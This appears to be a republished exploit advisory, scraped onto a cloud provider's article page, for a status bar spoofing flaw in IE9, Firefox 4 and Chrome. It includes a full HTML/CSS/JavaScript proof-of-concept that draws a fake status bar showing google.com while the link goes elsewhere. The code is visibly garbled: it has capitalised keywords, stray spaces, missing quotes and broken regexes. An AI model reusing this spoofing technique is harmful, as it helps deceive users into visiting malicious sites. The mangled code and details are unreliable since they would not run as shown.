IE & amp; Chrome & amp; Firefox Status Bar Spoofing Vulner

Source: Internet
Author: User

Via: XeyeTeam


# [+] Exploit Title: IE & Chrome & Firefox Status Bar Spoofing Vulnerability
# [+] Time: 1742011
# [+] Author: xisigr
# [+] Version: IE9.0 & Chrome all version & Firefox4.0
# [+] Tested On: WIN 7
# [+] CVE: N/

This vulnerability exists in all Google Chrome versions, Firefox 4.0 and IE9.0. There is no fixed status bar in these browsers. the status bar appears only when you place your mouse over a linked control. The URL of this link is displayed in the status bar. The status bar uses this design mode, which may cause some logical errors. An attacker uses a script to simulate a click Control. When the mouse moves to the control, the attacker uses images or text to simulate the status bar module. In this case, the status bar spoofing is achieved. When a user clicks the control link, the redirection address is not the address seen in the status bar, but a malicious Address unknown to the user. This is different from the traditional status bar spoofing. When attackers can use HTML to simulate a fixed module in the browser, spoofing will occur. Thanks to hysia for its discussion on POC optimization and evilcos.

Demo code:


<! DOCTYPE html>

<Html lang = "zh-CN">

<Head>

<Meta content = "text/html; charset = UTF-8" http-equiv = "Content-Type">

<Title> Status Bar Spoofing Vulnerability </title>

<Style>

. Firefox4 {

Background:-moz-linear-gradient (top, # fefefefe, # DDDDDD );

Width: 250px;

Height: 20px;

Border: solid 1px # cccccc;

-Moz-border-radius-topright: 3px;

Font-size: 12px;

Font-family: "";

Color: #333333;

Line-height: 20px;

Padding: 0px 0px 0px 5px;

Position: absolute;

Bottom: 0px; left: 0px;

Display: none;

}

. Chrome {

Background: # DFDFDF;

Width: 250px;

Height: 23px;

-Webkit-border-top-right-radius: 4px;

Font-size: 12px;

Font-family: "";

Color: #333333;

Line-height: 23px;

Padding: 0px 0px 0px 3px;

Position: absolute;

Bottom: 0px; left: 0px;

Display: none;

}

. Ie9 {

Filter: progid: DXImageTransform. Microsoft. gradient (startColorstr = # FFFFFF, endColorstr = # E4E5F0, GradientType = 0 );

Width: 250px;

Height: 20px;

Border: solid 1px #767676;

-Webkit-border-radius: 3px;

-Moz-border-radius: 3px;

Border-radius: 3px;

Box-shadow: 2px 2px 4px # 8E8E8E;

Font-size: 12px;

Font-family: "";

Color: #575757;

Line-height: 20px;

Padding: 0px 0px 0px 5px;

Position: absolute;

Bottom: 4px; left: 4px;

Display: none;

}


. Link {

Color: blue;

Text-decoration: underline;

Cursor: pointer;

}

</Style>

<Script>

Var Sys = {};

Var ua = navigator. userAgent. toLowerCase ();

Var s;

(S = ua. match (/msie ([d.] + )/))? Sys. ie = s [1]:

(S = ua. match (/firefox/([d.] + )/))? Sys. firefox = s [1]:

(S = ua. match (/chrome/([d.] + )/))? Sys. chrome = s [1]:

(S = ua. match (/opera. ([d.] + )/))? Sys. opera = s [1]:

(S = ua. match (/version/([d.] +). * safari /))? Sys. safari = s [1]: 0;


Function setClass (){

If (Sys. ie) document. getElementById ("statusbar"). className = "ie9 ";

If (Sys. firefox) document. getElementById ("statusbar"). className = "firefox4 ";

If (Sys. chrome) document. getElementById ("statusbar"). className = "chrome ";

If (Sys. opera) document. getElementById ("statusbar"). className = "opera ";

If (Sys. safari) document. getElementById ("statusbar"). className = "safari ";

}


Function showBrowser (){

If (Sys. ie) document. write (IE: + Sys. ie );

If (Sys. firefox) document. write (Firefox: + Sys. firefox );

If (Sys. chrome) document. write (Chrome: + Sys. chrome );

If (Sys. opera) document. write (Opera: + Sys. opera );

If (Sys. safari) document. write (Safari: + Sys. safari );

}


Function show (status ){

Document. getElementById ("statusbar"). style. display = status;

}


Function goto (url ){

Location = url;

}


</Script>

</Head>

<Body onload = "setClass ();">

<Div info> Your browser is <script> showBrowser () </script> try a <span class = "link" onMouseover = "show (block ); "onMouseout =" show (none) "onClick =" goto (http://xeyeteam.appspot.com/) "> DEMO </span> </div>

 

<Div id = "statusbar" class = ""> http://www.google.com... </div>

</Body>

</Html>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.